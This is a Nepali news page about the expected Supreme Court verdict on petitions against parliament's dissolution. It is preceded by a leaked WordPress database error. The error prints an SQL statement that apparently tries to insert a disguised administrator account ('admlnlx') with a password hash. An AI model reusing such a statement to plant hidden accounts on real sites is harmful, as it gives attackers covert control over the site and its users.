WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpKpM4K.Vann1jcIrdgpdg02bCGtFJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:49:28', '', 'admlnlx', 'admlnlx')

संसद विघटनसम्बन्धी मुद्दाको फैसला फागुन दोस्रो सातासम्म आउने संकेत – Gaule Khabar

संसद विघटनसम्बन्धी मुद्दाको फैसला फागुन दोस्रो सातासम्म आउने संकेत

संसद विघटनसम्बन्धी मुद्दाको फैसला फागुन दोस्रो सातासम्म आउने संकेत

त्यसले यो बहुचर्चित मुद्दाको फैसला आउने दुई साताभित्र हुने सम्भावना बढेको छ ।  प्रतिनिधिसभा विघटनविरुद्धको रिटबारे जारी सुनुवाइ यसैसाताभित्र टुंग्याइसक्न विपक्षी कानुन व्यवसायीसँग आग्रह गरेका छन् । आइतवारको सुनुवाइमा राणाले सरकारी पक्षलाई मिति तोकेरै आफ्नो बहस ३० माघभित्र सक्न भनेका हुन् । प्रधानमन्त्रीको पक्षमा बहस गरिरहेका अधिवक्ता रमेश बडाललाई उनले ३० माघभित्र विपक्षीका तर्फबाट बहस सक्नुपर्ने बताए । बडालले प्रधानमन्त्रीको तर्फको बहस सकिने बताएपछि उनले सबै विपक्षीको सक्न आग्रह गरे ।

संसद विघटनविरुद्ध परेका १३ वटा रिटमा राष्ट्रपति कार्यालय, प्रधानमन्त्री तथा मन्त्रिपरिषद कार्यालय, प्रधानमन्त्री केपी शर्मा ओलीलाई विपक्षी बनाइएको छ । प्रधानमन्त्रीको पक्षबाट १९ माघदेखि बहस पैरवी भइरहेको छ । विपक्षीको बहसपछि एमिकस क्यूरीका वरिष्ठ अधिवक्तालाई समय दिने र केही दिन न्यायाधीशलाई लाग्ने प्रधानन्यायाधीश राणाले बताएका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका